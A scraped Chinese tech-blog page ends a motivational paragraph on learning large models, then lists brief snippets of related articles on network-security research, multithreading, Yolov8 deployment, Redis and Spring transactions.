通过深入了解这些细节,并在实际项目中应用相关的知识,将能够更好地理解和利用大模型的潜力,不仅在学术研究中,也在工程实践中。通过不断探索新方法、参与项目和保持热情,并将其应用于各种领域,从自然语言处理到计算机视觉和自动驾驶。通过不断学习、实践和探索,可以不断提升自己在深度学习领域的技能和洞察力,同时也能为社会和行业带来创新和改进。从小规模的项目和模型开始,逐渐迭代和扩展到更大的模型,逐步积累经验,最终能够处理大模型和复杂任务。分享您的研究成果和代码,以获得反馈和建立声誉。
移动通信传输网络安全.pptx
06-29
该模型从传输线路、传输设备、网络结构、业务配置、传输网管五个维度出发,针对每个维度可能影响系统安全的要素进行分析,制定了具体安全要求和原则。 传输全方位安全模型示意图 移动通信传输网络安全全文共37页,...
车联网通信中的数据加密研究.pdf
07-16
例如,车辆面临来自云端接口、车载通信、系统固件等多方面的安全威胁,这包括但不限于未经授权的访问、系统后门、敏感信息泄露等问题。 文章强调了加密技术在车联网数据传输中的基础性作用。采用PKI技术体系,配合...
基于自然语言处理的网络安全后门检测算法开发.zip
03-07
在本项目中,深度学习模型可能包括循环神经网络(RNN)、长短时记忆网络(LSTM)或Transformer等,这些模型擅长处理序列数据,如文本信息,非常适合对网络通信中的语言模式进行分析。 机器学习则是一种数据驱动的...
开发多线程程序时,需要注意那些问题
最新发布
OO_SEN的博客
08-23 555
线程安全 竞态条件(Race Condition):当多个线程同时访问和修改共享资源时,可能会出现竞态条件,导致不确定的行为。需要通过同步机制(如互斥锁、读写锁、原子操作)来保护共享资源。 死锁(Deadlock):当两个或多个线程相互等待对方释放锁时,程序会陷入死锁状态。避免死锁的一些策略包括:避免嵌套锁、确保加锁顺序一致、使用超时机制等。 活锁(Livelock):与死锁不同,活锁是指线程不断地尝试获取资源但总是失败,导致无法继续执行。避免频繁重试操作或使用退避算法可以减少活锁的发生。 优先级反转(P
Yolov8:模型部署到安卓端
m0_70694811的博客
08-21 795
下载安装jdk-8u202-windows-x64.exe,这篇文章有百度网盘资源链接,直接下载,并按照这篇文章的JDK步骤进行安装和环境变量配置。C:\Program Files\Java\jdk-1.8\bin和C:\Program Files\Java\jdk-1.8\jre\bin。比如因为我的jdk路径是C:\Program Files\Java\jdk-1.8,所以这两个相对路径就改成。参考这边文章的USB驱动设置和手机端设置。同意协议后,下载相应版本的JDK。
笔记redis
风止的博客
08-22 1081
Redis(Remote Dictionary Server)是用C语言开发的一个基于的数据库
@Transactional中使用线程锁导致了锁失效与解决方案
liuruiaaa的博客
08-23 770
@Transactional中使用线程锁导致了锁失效与解决方案
工业物联网后门隐私泄露感知方法研究
本文主要探讨了"面向工业物联网环境下后门隐私泄露感知方法"这一主题,发表在《软件学报》2018年第7期,作者包括沙乐天、肖甫、陈伟、孙晶和王汝传,来自南京邮电大学计算机学院、江苏省无线传感网高技术重点实验室...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值